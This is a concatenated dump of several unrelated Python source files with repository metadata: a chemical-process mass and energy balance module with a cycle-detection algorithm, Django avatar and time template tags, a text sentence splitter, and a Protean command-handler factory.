self.x[substance] = None
self._x[f'x_{self.name}_{substance.name}'] = None
self.T = None
self.add_info(**info)
# Equipment (connection) information
self.leaves = None
self.enters = None
def __str__(self):
return self.name
def __contains__(self, item: Substance):
if item in self.composition:
return True
else:
return False
@property
def name(self):
return self._name
@staticmethod
def restriction(flow: 'Flow') -> float:
"""Mass fraction restriction equation (sum(x) = 1).
.. warning::
As of now, the code ignores the ``None`` values (considers them
as equal to zero). No Exception is raised.
Args:
flow: A Flow object
Returns:
The sum of the stream's mass fractions minus 1.
"""
x = list(flow.x.values())
try:
while True:
x.remove(None)
except ValueError: # list.remove(None): None not in list.
pass
# TODO: should an error be generated when None is still specified?
# added the "float" because I may change the type of x in the future.
return float(sum(x)) - 1
def add_info(self, **info: float):
# TODO: add this info to the equations? How will this work?
backup_x = self.x.copy()
dictionary = {substance.name: substance for substance in self.x}
try:
for kwarg in info:
data = info[kwarg]
if kwarg in dictionary:
if data > 1 or data < 0:
raise ValueError(
f"Informed an invalid value for a mass fraction: "
f"{kwarg} = {data}."
)
self.x[dictionary[kwarg]] = data
self._x[f"x_{self.name}_{kwarg}"] = data
# self.equations[f"x_{self.name}_{kwarg}"] = data
elif kwarg == "w":
if data < 0:
raise ValueError(
f"Informed a negative flow rate: "
f"{kwarg} = {data}."
)
self.w = data
# self.equations["w"] = data
# Add more information in the future.
else:
warn(f"User unknown specified property: {kwarg} = {data}.")
if self.restriction(self) > Flow.tolerance:
raise ValueError("Restriction Error: sum(x) > 1.")
except ValueError as e:
self.x = backup_x
raise ValueError(e)
def add_substances(self, *substances: Substance, **info: float):
"""Method for adding substances to the current.
Args:
substances: :class:`Substance` objects of the substances we want to
add.
info: Additional info we want to add the the flow's attributes. It
doesn't have to be related the the substances that are being
added.
"""
for substance in substances:
if substance in self.composition:
continue
else:
self.composition.append(substance)
self.x[substance] = None
self._x[f'x_{self.name}_{substance.name}'] = None
self.add_info(**info)
self._update_restriction(self.name) # Updating the restriction function
def remove_substances(self, *substances: Substance, **info: float):
for substance in substances:
if substance not in self.composition:
continue
else:
self._x.pop(f'x_{self.name}_{substance.name}')
self.x.pop(substance)
# Update mass and molar fractions
self.add_info(**info)
self._update_restriction(self.name)
def _update_restriction(self, name):
while True:
generator = (f'x_{name}_{substance.name}: None = None, '
for substance in self.composition)
args = "flow: 'Flow', "
for entry in generator:
args += entry
try:
string =\
f"""
def mass_fraction_restriction_{name}({args}) -> float:
'''Mass fraction restriction equation (sum(x) = 1).
This function is created dynamically with the
:func:`Flow._update_restriction` method. It should not be called by the
user, but only by the equation ordering algorithm.
'''
warn("Do not call protected methods.")
return Flow.restriction(flow)
self._equations['restriction'] = mass_fraction_restriction_{name}
"""
exec(string)
break
except SyntaxError:
name = input(
f"Invalid name: {name}. Please inform a new name.")
self._name = name
def _add_connections(
self, leaves: 'Equipment' = None, enters: 'Equipment' = None):
"""Method for beginning and end points for the flow.
Will be useful in the future when we define a :class:`Process` class.
"""
if leaves is not None:
self.leaves = leaves
# leaves.add_outflows(self)
if enters is not None:
self.enters = enters
# enters.add_inflows(self)
def _remove_connections(self, leaves: bool = False, enters: bool = False,
equipment: 'Equipment' = None):
"""Method for removing connections.
TODO: possibly remove 'leaves' and 'enters' arguments, since this
method should only be called through the remove_flow method (from
the Equipment class).
"""
if (not leaves) and (not enters) and equipment is None:
warn("No connection was removed because None were specified.")
if leaves:
# self.leaves.remove_flow(self)
print(f"Removed {self.leaves.name} from {self.name}.leaves.")
self.leaves = None
if enters:
# self.enters.remove_flow(self)
print(f"Removed {self.enters.name} from {self.name}.enters.")
self.enters = None
if equipment is not None:
if equipment == self.enters:
# self.enters.remove_flow(self)
print(f"Removed {self.enters.name} from {self.name}.enters.")
self.enters = None
elif equipment == self.leaves:
# self.leaves.remove_flow(self)
print(f"Removed {self.leaves.name} from {self.name}.leaves.")
self.leaves = None
else:
raise NameError(f"Equipment {equipment} isn't connected to this"
f" process current {self}."
f" It connects {self.leaves} to {self.enters}.")
class Equipment:
"""Class for equipments
TODO: There still need to be constant updates of the w and x
quantities.
"""
def __init__(self, name: str):
self._name = name
self.composition = []
self.w = None
self.x = {}
# Not yet implemented:
self._reaction = True
self.reaction_list = []
self.reaction_rate = {}
self.reaction_rate_mol = {}
self.inflow = []
self.outflow = []
self.equations = {}
self._equations = {}
self.heat = None # Heat
self.work = None # Work
self.T_ref = None # Reference Temperature for Enthalpy Calc.
def __str__(self):
return self.name
def __iter__(self):
for flow in self.outflow:
yield flow
for flow in self.inflow:
yield flow
def __contains__(self, item: Union[Substance, Flow]):
"""Tests if a Substance is present in the equipment, or if a Flow enters
or leaves it.
TODO: Add the possibility of item being a string
"""
if (item in self.inflow) or item in (self.outflow):
return True
elif item in self.composition:
return True
else:
return False
@property
def name(self):
return self._name
@property
def reaction(self):
return self._reaction
@staticmethod
def component_mass_balance(equipment: 'Equipment', substance: Substance) -> float:
"""Component Mass Balance for substance a given substance and equipment.
TODO: maybe raise an error if the return value goes over the tolerance.
"""
if substance not in equipment:
raise TypeError(
f"This equipment does not have this substance in it:"
f" {substance.name}"
)
inflows = equipment.inflow
outflows = equipment.outflow
result = 0
for flow in equipment:
if substance in flow:
if flow.w is None:
raise ValueError(
f"Uninitialized value for flow rate at stream: "
f"{flow.name}")
elif flow.x[substance] is None:
raise ValueError(
f"Uninitialized mass fraction at stream: {flow.name}")
if flow in outflows:
result += flow.w * flow.x[substance]
else:
result -= flow.w * flow.x[substance]
return result
@staticmethod
def energy_balance(equipment: 'Equipment', T_ref: float = None) -> float:
inflows = equipment.inflow
outflows = equipment.outflow
result = 0
if T_ref is None:
if equipment.T_ref is None:
T_ref = equipment.inflow[0].T
equipment.T_ref = T_ref
else:
T_ref = equipment.T_ref
else:
equipment.T_ref = T_ref
for flow in equipment:
for substance in flow:
if flow.w is None:
raise ValueError(
f"Uninitialized value for flow rate at stream:"
f" {flow.name}")
elif flow.x[substance] is None:
raise ValueError(
f"Uninitialized mass fraction at stream: {flow.name}")
else:
if flow in outflows:
sign = 1
elif flow in inflows:
sign = -1
else:
raise RuntimeError(
"Unexpected Error."
" Flow neither in inflow nor outflow")
result += sign * flow.w * flow.x[substance] * \
Substance.cp(substance, flow.T, T_ref) * \
(flow.T - T_ref)
if equipment.heat is not None:
result += equipment.heat
if equipment.work is not None:
result += equipment.heat
return result
def _update_balances(self):
"""Generates the component mass balances for each substance that comes
into the equipment, as well as the system's energy balance.
"""
name = self.name
while True:
try:
# Pick a substance
for substance in self.composition:
w = []
x = []
# Pick a stream:
for flow in self:
# If the substance is present on that stream:
if substance in flow:
w.append(f"W_{flow.name}")
mass_fraction = f"x_{flow.name}_{substance.name}"
if mass_fraction not in flow._x:
raise NameError(
f"Mass fraction {mass_fraction} not in the stream."
f" Possibly a naming error (check if the naming"
f" convention has changed). The stream contains"
f" the following mass fractions:\n{flow._x}.")
x.append(mass_fraction)
# mass balance:
args = "equipment: 'Equipment', substance: Substance, "
for w_val, x_val in zip(w, x):
args += f"{w_val}: None = None, "
args += f"{x_val}: None = None, "
string =\
f"""
def component_mass_balance_{name}_{substance.name}({args}) -> float:
'''Component Mass Balance for substance {substance.name}.
This function is generated automatically and dynamically by the
:func:`Equipment._update_mass_balance` method. It should only be used
by the equation ordering algorithm.
'''
warn("Do not call protected methods.")
return Equipment.component_mass_balance(equipment, substance)
self._equations['mass_balance_{name}_{substance.name}'] = \\
component_mass_balance_{name}_{substance.name}
"""
exec(string)
break
except SyntaxError:
name = input(
f"Invalid name: {name}. Please inform a new name."
)
self._name = name
w = []
x = []
T = []
for flow in self:
T.append(f"T_{flow.name}")
w.append(f"W_{flow.name}")
for substance in flow.composition:
mass_fraction = f"x_{flow.name}_{substance.name}"
if mass_fraction not in flow._x:
raise NameError(
f"Mass fraction {mass_fraction} not in the stream."
f" Possibly a naming error (check if the naming"
f" convention has changed). The stream contains"
f" the following mass fractions:\n{flow._x}.")
x.append(mass_fraction)
# energy balance:
# For the sake of generality, we'll assume each eqp. will have a T_ref
args = f"equipment: 'Equipment', Q_{name}: float = None," \
f" W_{name}: float = None, T_ref_{name}: float = None, "
for w_val in w:
args += f"{w_val}: None = None, "
for x_val in x:
args += f"{x_val}: None = None, "
for T_val in T:
args += f"{T_val}: None = None, "
string = \
f"""
def energy_balance_{name}({args}) -> float:
'''Energy balance for equipment {name}.
This function is generated automatically and dynamically by the
:func:`Equipment._update_balances` method. It should only be used
by the equation ordering algorithm.
'''
warn("Do not call protected methods.")
return Equipment.energy_balance(equipment)
self.equations['energy_balance_{name}'] = \\
energy_balance_{name}
"""
exec(string)
def add_inflows(self, *inflows: Flow):
"""Method for adding a current to the inflows.
Automatically adds new substances to the class's composition attribute.
Args:
*inflows: :class:`Flow` objects we want to add to the inflow.
"""
self._add_flow("inflow", "outflow", *inflows)
def add_outflows(self, *outflows: Flow):
"""Method for adding a current to the outflows.
Args:
*outflows: :class:`Flow` objects we want to add to the inflow.
"""
self._add_flow("outflow", "inflow", *outflows)
def _add_flow(self, direction: str, other_direction: str, *flows: Flow):
"""Adds flows to the the equipment
Args:
direction: "inflow" or "outflow".
other_direction: "outflow" or "inflow".
flows: :class:`Flow` objects we want to add to the in or outflow.
"""
attribute = getattr(self, direction)
other_attribute = getattr(self, other_direction)
for flow in flows:
if flow in attribute:
warn(f"Current {flow} already in {direction}, skipped.")
continue
elif flow in other_attribute:
warn(f"Current {flow} already in {other_direction}, make"
f" sure to correctly specify the flow direction. Nothing"
f" has been changed.")
continue
else:
attribute.append(flow)
if direction == 'inflow':
flow._add_connections(enters=self)
elif direction == 'outflow':
flow._add_connections(leaves=self)
# If a new substance is added:
# if direction == 'outflow':
# for substance in flow.composition:
# if substance not in self.composition:
# warn(f"Ouflow {flow.name} has a substance that does not"
# f" enter the equipment: {substance}.")
# composition attribute is already updated there^
self.update_composition()
def remove_flow(self, flow: Union[str, Flow]):
"""Method for removing a current from the in and outflows.
Args:
flow: Either a :class:`Flow` object or the name of an instance of
one.
"""
if isinstance(flow, Flow):
name = flow.name
elif isinstance(flow, str):
name = flow
pass
else:
raise TypeError(f"Invalid type: {type(flow)}."
f" Argument must be string or a 'Flow' instance.")
# Checking for its presence in the inflow
for object in self.inflow:
if object.name == name:
if isinstance(flow, str):
flow = object
flow._remove_connections(equipment=self)
self.inflow.remove(object)
# Checking for its presence in the outflow
for object in self.outflow:
if object.name == name:
if isinstance(flow, str):
flow = object
flow._remove_connections(equipment=self)
self.outflow.remove(object)
# Updating the equipment's and possibly the outflow's compositions:
# substances = []
# for flow in self.inflow:
# for substance in flow.composition:
# if substance not in substances:
# substances.append(substance) # Grouping all substances
# # Present in the inflow
#
# for substance in self.composition:
# if substance not in substances:
# # Removing from the equipment's composition those that are
# # no longer present in inflow:
# Substance.remove_substances(self, substance)
#
# for flow in self.outflow:
# for substance in flow.composition:
# if substance not in self.composition:
# # Also removing them from consequent outflows
# Substance.remove_substances(flow, substance)
# self._update_mass_balance()
self.update_composition()
def add_reaction(self, **kwargs):
"""Adds a chemical reaction to the equipment. TODO
Args:
**kwargs:
Returns:
"""
self._reaction = True
self.reaction_list.append(kwargs)
def toggle_reaction(self):
"""TODO: update everything else that is related to chemical reactions.
(mass balances etc.).
"""
if self._reaction:
while sure not in ['y', 'n']:
sure = input(
"Are you sure you want to toggle chemical reactions off? [y/n]")
if sure == 'y':
self._reaction = False
else:
return False
else:
self._reaction = True
print(f"Reaction is now {self._reaction}")
return True
def update_composition(self, update_outflows: bool = False):
"""Updates the equipment's composition attribute, based on its streams.
This may also update its outflow streams if the equipment's ``reaction``
attribute is ``False`` (meaning that no reaction takes place in the
equipment) and the ``update_outflows`` argument is True.
This is to avoid problems when generating errors when creating processes
through the :func:`Process.sequential` method. If the outflows are
updated as the process is being created, then it will overwrite and
delete substances. However, when all connections are already
established, it may be useful to use ``update_outflows = True``.
.. note::
This implementation is only valid for an Equipment that does not
involve a chemical reaction, because it removes substances that
do not enter the equipment. For an equipment with reaction see
:class:`Reactor`.
"""
all_substances = []
# Checking all substances that enter the equipment,
# if some of them are not present in the equipment's composition
# attribute, then they are included.
for flow in self.inflow:
for substance in flow.composition:
if substance not in self.composition:
self.composition.append(substance)
# Substance.add_substances(self, substance)
if substance not in all_substances:
all_substances.append(substance)
# Now checking if there's a substance present in the composition
# attribute that did not enter the equipment.
if not self.reaction:
# This is only a problem when there aren't any chemical reactions
for substance in self.composition:
if substance not in all_substances:
self.composition.remove(substance)
# Checking if the outflows contain all of the substances that entered
# the equipment. In some cases, we may consider that they are zero when
# we have a complete reaction, but we add this for the sake of
# generality and to avoid problems with the mass balances in
# reaction-less equipments (because mass balances with reaction haven't
# yet been implemented: TODO).
for flow in self.outflow:
for substance in self.composition:
if substance not in flow:
flow.add_substances(substance)
# If there aren't any chemical reactions AND we have specified that we
# want to update the outflows' compositions, then we'll remove
# from the outflows the substances that are not present in the equipment
if not self.reaction and update_outflows:
for flow in self.outflow:
for substance in flow.composition:
if substance not in self.composition:
# Also removing them from consequent outflows
Substance.remove_substances(flow, substance)
self._update_balances()
class Process:
"""Process object
"""
def __init__(self):
self.equipments = []
self.streams = []
def sequential(self, *args: Union[Flow, Equipment]):
sequence = [None]
for arg in args:
print(arg.name)
if isinstance(arg, Flow):
setattr(self, arg.name, arg)
if isinstance(sequence[-1], Equipment):
eqp = sequence[-1]
arg.add_substances(
*(substance for substance in eqp.composition))
eqp.add_outflows(arg)
sequence.append(arg)
self.streams.append(arg)
elif isinstance(arg, Equipment):
setattr(self, arg.name, arg)
if isinstance(sequence[-1], Flow):
flw = sequence[-1]
arg.add_inflows(flw)
sequence.append(arg)
self.equipments.append(arg)
else:
raise TypeError(f"Invalid argument type: {type(arg)}."
f"Excpected Flow or Equipment.")
def update_compositions(self, update_outflows: bool = False):
"""Method for updating equipments' and streams' compositions.
May be unfinished
"""
for stream in self.streams:
if stream.leaves is not None:
eqp = stream.leaves
stream.add_substances(
*(substance for substance in eqp.composition
if substance not in stream.composition))
print(stream.name,
eqp.name,
*(substance.name for substance in stream.composition)
)
if stream.enters is not None:
eqp = stream.enters
if eqp not in self.equipments:
self.equipments.append(eqp)
print(stream.name,
eqp.name)
eqp.update_composition(update_outflows)
def add_objects(self, *args):
for arg in args:
if isinstance(arg, Flow):
self.streams.append(arg)
setattr(self, arg.name, arg)
elif isinstance(arg, Equipment):
self.equipments.append(arg)
setattr(self, arg.name, arg)
else:
raise TypeError(f"Invalid object type: {arg}, type {type(arg)}")
def equations(self) -> Generator:
for equipment in self.equipments:
for equation in equipment._equations.values():
yield equation
for flow in self.streams:
for equation in flow._equations.values():
yield equation
def graph(self):
graph = nx.DiGraph()
graph.add_nodes_from(
list(equipment.name for equipment in self.equipments)
)
edge_list = []
label_dict = {}
entrance_nb = 1
exit_nb = 1
# TODO: fix bug (<-F4->, <-F9->)
# Actually, we have F4 stacked on top of F3. Analogous for F9
# Think of how to adapt this. A botch may need to be done
for stream in self.streams:
if stream.leaves is None:
leave_str = f'IN {entrance_nb}'
entrance_nb += 1
else:
leave_str = str(stream.leaves)
if stream.enters is None:
enter_str = f'OUT {exit_nb}'
exit_nb += 1
else:
enter_str = str(stream.enters)
print(stream, (leave_str, enter_str))
edge_list.append(
(leave_str, enter_str)
)
label_dict[(leave_str, enter_str)] = stream.name
graph.add_edges_from(edge_list)
options = {
'with_labels': True,
'node_color': 'lightgray',
'node_size': 2000
}
# for index, node in enumerate(graph.nodes()):
# graph.nodes[node]['subset'] = index//3
# pos = nx.multipartite_layout(graph, subset_key='subset')
pos = nx.planar_layout(graph)
nx.draw(graph, pos, **options)
nx.draw_networkx_edge_labels(graph, pos, edge_labels=label_dict)
fig = plt.gcf()
fig.set_size_inches(12, 6)
self._graph = graph
plt.show()
def moa(process: Process, *known_variables):
"""Module ordering algorithm.
Orders different process modules (equipments) in order for solving problems.
Args:
process: A :class:`Process` object with all of connected equipments and
streams for ordering.
*known_variables: The variables that are considered to be known.
"""
def check_bifurcations(
stream_list: list, equipment_list: list, bifurcation_dict: dict):
# Now we have to check for bifurcations
# For this, we'll have to go back on the equipment list and check
# if there are any bifurcations left in the bifurcation dictionary
eqp_iter = equipment_list.copy()
eqp_iter.pop(-1) # ignoring the equipment we've just added
eqp_iter.reverse() # going backwards
for eqp in eqp_iter:
if eqp.name in bifurcation_dict:
if len(bifurcation_dict[eqp.name]) == 0:
continue
else:
new_stream = bifurcation_dict[eqp.name][-1]
print(f"Bifurcation: taking stream {new_stream.name}",
f"from equipment {eqp.name}.")
bifurcation_dict[eqp.name].pop(-1)
# Getting the equipment's position in the list
idx = equipment_list.index(eqp)
# We continue from the bifurcation:
stream_list = stream_list[:idx + 1]
equipment_list = equipment_list[:idx + 1]
print(f"Updated stream and equipment lists:\n",
*(stm.name for stm in stream_list), '\n',
*(eqp.name for eqp in equipment_list), '\n')
break # the for loop.
else:
return None
return stream_list, equipment_list, bifurcation_dict, new_stream
# No bifurcations left.
# Picking the first stream:
entering_streams = []
for stream in process.streams:
if stream.leaves is None:
entering_streams.append(stream)
cycle_list = []
studied_equipments = []
bifurcations = {}
for entering_stream in entering_streams:
current_stream = entering_stream
print("################# Entering through", entering_stream)
stm_list = []
eqp_list = []
# update list of studied equipments
for cycle in cycle_list:
_, saved_eqps = cycle
for equipment in saved_eqps:
if equipment not in studied_equipments:
studied_equipments.append(equipment)
while True:
print(f"Current Stream: {current_stream.name}")
equipment = current_stream.enters
# If equipment already in the list, then we have a cycle:
if equipment in eqp_list:
stm_list.append(current_stream)
eqp_list.append(equipment)
print(f"Cycle detected:", *(eqp.name for eqp in eqp_list))
idx = eqp_list.index(equipment)
cycle_list.append((stm_list[idx+1:], eqp_list[idx:]))
tup = check_bifurcations(stm_list, eqp_list, bifurcations)
if tup is None:
print("End of the process.")
break # the while loop
else:
stm_list, eqp_list, bifurcations, current_stream = tup
continue
else:
stm_list.append(current_stream)
eqp_list.append(equipment)
if equipment is None or equipment in studied_equipments:
if equipment is None:
print(f"This stream leaves the process")
else:
print(f"This path has already been studied (equipment"
f" {equipment.name}).")
tup = check_bifurcations(stm_list, eqp_list, bifurcations)
if tup is None:
print("End of the process.")
break # the while loop
else:
stm_list, eqp_list, bifurcations, current_stream = tup
continue
else:
print(f"Leads to: {equipment.name}")
out_streams = equipment.outflow.copy()
if len(out_streams) == 1:
current_stream = out_streams[0]
elif len(out_streams) < 1:
raise ValueError(f"Empty ouflow for equipment {equipment}.")
else:
print("Equipment with bifurcation, possible outflows:",
*(stm.name for stm in out_streams))
current_stream = out_streams[-1]
out_streams.pop(-1)
# Add bifurcations bifurcation list:
bifurcations[equipment.name] = out_streams
# Now for defining the actual order in which we'll solve the system
# We first create a matrix in which we list the streams and the cycles they
# appear in
# I have to check for known variables though...
# Checking for repeated cycles:
for cycle in cycle_list:
instances = cycle_list.count(cycle)
if instances > 1:
for i in range(instances - 1):
cycle_list.remove(cycle)
# Incidence matrix:
inmx = np.zeros((len(cycle_list), len(process.streams)))
for row, cycle in enumerate(cycle_list):
stream_list, _ = cycle
for stream in stream_list:
print(stream.name)
col = process.streams.index(stream)
inmx[row, col] = 1
print(len(process.streams))
print(*(stream.name for stream in process.streams))
stream_order = []
while inmx.sum(): # While the incidence matrix isn't zero:
fig, ax = plt.subplots(1, 1)
img = ax.imshow(inmx)
ax.set_xticks([i for i in range(len(process.streams))])
ax.set_xticklabels([stream.name for stream in process.streams])
ax.set_yticks([i for i in range(len(cycle_list))])
ax.set_yticklabels([i+1 for i in range(len(cycle_list))])
ax.set_ylabel("Cycles")
ax.set_xlabel("Streams")
plt.show(block=True)
col_sum = inmx.sum(axis=0)
idx = np.argmax(col_sum)
stream_order.append(process.streams[idx])
inmx[inmx[:, idx] == 1] = 0
print(*(stream.name for stream in stream_order))
return cycle_list
if __name__ == '__main__':
def f1(x1, x2):
return None
def f2(x1, x2, x3, x4):
return None
def f3(x3, x4):
return None
def f4(x4, x5):
return None
_ = aoe2(f1, f2, f3, f4, x1=1)
from main import *
from substances import *
p = Process()
F1 = Flow("F1")
F2 = Flow("F2")
F3 = Flow("F3")
F4 = Flow("F4")
F5 = Flow("F5")
F6 = Flow("F6")
F7 = Flow("F7")
F8 = Flow("F8")
F9 = Flow("F9")
A = Equipment("A")
B = Equipment("B")
C = Equipment("C")
D = Equipment("D")
p.sequential(
F1,
A,
F2,
B,
F4,
D,
F6,
C,
F7
)
p.add_objects(F3, F5, F7, F8, F9)
p.A.add_inflows(F3, F8)
p.B.add_inflows(F5, F7)
p.B.add_outflows(F3)
p.D.add_outflows(F5, F8, F9)
F1.add_substances(Water)
p.update_compositions()
print(A.composition)
cycle_list = moa(p)
# Printing the cycles
for cycle in cycle_list:
for data in cycle:
print(*(arg.name for arg in data))
"""Output:
UserWarning: No substances informed.
warn("No substances informed.")
F1
A
F2
B
F4
D
F6
C
F7
F1 A
F2 A Water
F2 B
F4 B Water
F4 D
F6 D Water
F6 C
F7 C Water
F7 B
F3 B Water
F3 A
F5 D Water
F5 B
F7 C Water
F7 B
F8 D Water
F8 A
F9 D Water
[<class 'substances.Water'>]
################# Entering through F1
Current Stream: F1
Leads to: A
Current Stream: F2
Leads to: B
Equipment with bifurcation, possible outflows: F4 F3
Current Stream: F3
Cycle detected: A B A
Bifurcation: taking stream F4 from equipment B.
Updated stream and equipment lists:
F1 F2
A B
Current Stream: F4
Leads to: D
Equipment with bifurcation, possible outflows: F6 F5 F8 F9
Current Stream: F9
This stream leaves the process
Bifurcation: taking stream F8 from equipment D.
Updated stream and equipment lists:
F1 F2 F4
A B D
Current Stream: F8
Cycle detected: A B D A
Bifurcation: taking stream F5 from equipment D.
Updated stream and equipment lists:
F1 F2 F4
A B D
Current Stream: F5
Cycle detected: A B D B
Bifurcation: taking stream F6 from equipment D.
Updated stream and equipment lists:
F1 F2 F4
A B D
Current Stream: F6
Leads to: C
Current Stream: F7
Cycle detected: A B D C B
End of the process.
# [comment] The cycles identified (raw output after comment):
# [comment] outputs must still be adapted to only show the actual
# [comment] cycle streams and equipments, now it shows the whole path.
F1 F2 F3
A B A
F1 F2 F4 F8
A B D A
F1 F2 F4 F5
A B D B
F1 F2 F4 F6 F7
A B D C B
"""
| 35.585806 | 105 | 0.538906 |
7930134972a27ddb372f9b29206b46d022e175d6 | 3,985 | py | Python | src/cobra/templatetags/helper_tags.py | lyoniionly/django-cobra | 2427e5cf74b7739115b1224da3306986b3ee345c | [
"Apache-2.0"
] | 1 | 2015-01-27T08:56:46.000Z | 2015-01-27T08:56:46.000Z | src/cobra/templatetags/helper_tags.py | lyoniionly/django-cobra | 2427e5cf74b7739115b1224da3306986b3ee345c | [
"Apache-2.0"
] | null | null | null | src/cobra/templatetags/helper_tags.py | lyoniionly/django-cobra | 2427e5cf74b7739115b1224da3306986b3ee345c | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
import six
from datetime import timedelta
from django import template
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _, get_language
from cobra.core.javascript import to_json
from cobra.core.loading import get_model, get_class
from cobra.core.utils import multi_get_letter, get_datetime_now
from cobra.apps.accounts.utils import get_default_avatar_url, get_user, get_avatar_url as get_avatar_url_util
from cobra.core.compat import get_user_model
from cobra.core.http import absolute_uri
from cobra.core import locale
from cobra.core.dates import epoch
register = template.Library()
register.filter(to_json)
@register.filter
def needs_access_group_migration(user, organization):
AccessGroup = get_model('accessgroup', 'AccessGroup')
OrganizationMember = get_model('organization', 'OrganizationMember')
OrganizationMemberType = get_class('organization.utils', 'OrganizationMemberType')
has_org_access_queryset = OrganizationMember.objects.filter(
user=user,
organization=organization,
has_global_access=True,
type__lte=OrganizationMemberType.ADMIN,
)
if not (user.is_superuser or has_org_access_queryset.exists()):
return False
return AccessGroup.objects.filter(
team__organization=organization
).exists()
@register.simple_tag
def get_avatar_url(user, size=settings.COBRA_ACCOUNTS_AVATAR_DEFAULT_SIZE):
return get_avatar_url_util(user, size)
@register.inclusion_tag('partials/_avatar_tag.html')
def get_avatar(user, size=settings.COBRA_ACCOUNTS_AVATAR_DEFAULT_SIZE, **kwargs):
if not isinstance(user, get_user_model()):
try:
user = get_user(user)
alt = six.text_type(user)
url = get_avatar_url(user, size)
except get_user_model().DoesNotExist:
url = get_default_avatar_url()
alt = _("Default Avatar")
else:
alt = six.text_type(user)
url = get_avatar_url(user, size)
context = dict(kwargs, **{
'user': user,
'url': url,
'alt': alt,
'size': size,
})
return context
@register.filter
def user_display_name(user):
return user.get_full_name() or user.username
@register.inclusion_tag('partials/project_avatar.html')
def get_project_avatar(project, css_class=''):
has_avatar = False
cxt = {'project': project}
if project.avatar:
has_avatar = True
else:
allowed_colors = {
'red': 'FFEBEE',
'purple': 'F3E5F5',
'indigo': 'E8EAF6',
'blue': 'E3F2FD',
'teal': 'E0F2F1',
'orange': 'FBE9E7',
'gray': 'EEEEEE'
}
css_class += ' identicon'
bg_key = project.id % 7
style = "background-color: #%s; color: #555" % allowed_colors.values()[bg_key]
first_cap = multi_get_letter(project.name)[0]
cxt.update({'style': style, 'first_cap': first_cap.upper()})
cxt.update({'has_avatar': has_avatar, 'css_class': css_class, })
return cxt
@register.filter
def timesince_ago(value, now=None):
from django.template.defaultfilters import timesince
if now is None:
now = timezone.now()
if not value:
return _('never')
if value < (now - timedelta(days=5)):
return value.date()
value = (' '.join(timesince(value, now).split(' ')[0:2])).strip(',')
if value == _('0 minutes'):
return _('just now')
if value == _('1 day'):
return _('yesterday')
return value + _(' ago')
@register.filter
def absolute_url(url):
return absolute_uri(url)
@register.assignment_tag
def moment_locale():
locale_mapping = getattr(settings, 'MOMENT_LOCALES',
locale.LOCALE_MAPPING)
return locale_mapping.get(get_language(), 'en')
@register.simple_tag
def now_epoch():
return epoch(get_datetime_now(), msec=True) | 29.962406 | 109 | 0.677541 |
bb134329973bfa0d6a1f2685165d0cd29ba44759 | 1,038 | py | Python | Utils.py | YungRAW/ComputerScienceLicense---PlagiarismChecker | 411199d4d8cb33dbeebc0f204c46d74c976fb9cd | [
"MIT"
] | 10 | 2020-06-29T13:18:22.000Z | 2021-07-29T02:19:54.000Z | Utils.py | YungRAW/ComputerScienceLicense---PlagiarismChecker | 411199d4d8cb33dbeebc0f204c46d74c976fb9cd | [
"MIT"
] | 1 | 2020-08-20T17:29:31.000Z | 2020-08-20T19:43:12.000Z | Utils.py | YungRAW/ComputerScienceLicense---PlagiarismChecker | 411199d4d8cb33dbeebc0f204c46d74c976fb9cd | [
"MIT"
] | 2 | 2021-08-24T18:57:20.000Z | 2022-02-17T00:31:02.000Z | import re
def split_text_max_words(lines, max_words):
sentences = []
for line in lines:
splits = re.finditer("\. [A-Z]|\.\n", line)
last_split_idx = 0
for split in splits:
sentence = line[last_split_idx: split.start() + 1]
if(len(sentence.split(" ")) >= 5):
sentences.append(sentence)
last_split_idx = split.start() + 2
sentence_splitted_by_max_words = []
for sentence in sentences:
words = sentence.split(" ")
for i in range(len(words) // max_words):
begin = i*max_words
end = (i+1)*max_words
sentence_splitted_by_max_words.append(" ".join(words[begin : end]))
if(len(words) % max_words != 0):
begin = (len(words) // max_words)*max_words
end = (len(words) // max_words)*max_words + (len(words) % max_words)
sentence_splitted_by_max_words.append(" ".join(words[begin : end]))
return sentence_splitted_by_max_words
| 34.6 | 80 | 0.570328 |
0c51ba6c79548338d911c506b0cadf274268e327 | 3,102 | py | Python | src/protean/core/command_handler.py | mpsiva89/protean | 315fa56da3f64178bbbf0edf1995af46d5eb3da7 | [
"BSD-3-Clause"
] | null | null | null | src/protean/core/command_handler.py | mpsiva89/protean | 315fa56da3f64178bbbf0edf1995af46d5eb3da7 | [
"BSD-3-Clause"
] | null | null | null | src/protean/core/command_handler.py | mpsiva89/protean | 315fa56da3f64178bbbf0edf1995af46d5eb3da7 | [
"BSD-3-Clause"
] | null | null | null | import inspect
from protean.container import Element, OptionsMixin
from protean.core.command import BaseCommand
from protean.exceptions import IncorrectUsageError, NotSupportedError
from protean.utils import DomainObjects, derive_element_class, fully_qualified_name
from protean.utils.mixins import HandlerMixin
class BaseCommandHandler(Element, HandlerMixin, OptionsMixin):
"""Base Command Handler class that should implemented by all Domain CommandHandlers.
This is also a marker class that is referenced when command handlers are registered
with the domain
"""
element_type = DomainObjects.COMMAND_HANDLER
@classmethod
def _default_options(cls):
return [("aggregate_cls", None)]
def __new__(cls, *args, **kwargs):
if cls is BaseCommandHandler:
raise TypeError("BaseCommandHandler cannot be instantiated")
return super().__new__(cls)
def command_handler_factory(element_cls, **kwargs):
element_cls = derive_element_class(element_cls, BaseCommandHandler, **kwargs)
if not element_cls.meta_.aggregate_cls:
raise IncorrectUsageError(
{
"_entity": [
f"Command Handler `{element_cls.__name__}` needs to be associated with an Aggregate"
]
}
)
# Iterate through methods marked as `@handle` and construct a handler map
if not element_cls._handlers: # Protect against re-registration
methods = inspect.getmembers(element_cls, predicate=inspect.isroutine)
for method_name, method in methods:
if not (
method_name.startswith("__") and method_name.endswith("__")
) and hasattr(method, "_target_cls"):
# Do not allow multiple handlers per command
if (
fully_qualified_name(method._target_cls) in element_cls._handlers
and len(
element_cls._handlers[fully_qualified_name(method._target_cls)]
)
!= 0
):
raise NotSupportedError(
f"Command {method._target_cls.__name__} cannot be handled by multiple handlers"
)
# `_handlers` maps the command to its handler method
element_cls._handlers[fully_qualified_name(method._target_cls)].add(
method
)
# Associate Command with the handler's stream
if inspect.isclass(method._target_cls) and issubclass(
method._target_cls, BaseCommand
):
# Order of preference:
# 1. Stream name defined in command
# 2. Stream name derived from aggregate associated with command handler
method._target_cls.meta_.stream_name = (
method._target_cls.meta_.stream_name
or element_cls.meta_.aggregate_cls.meta_.stream_name
)
return element_cls
| 39.769231 | 104 | 0.618956 |
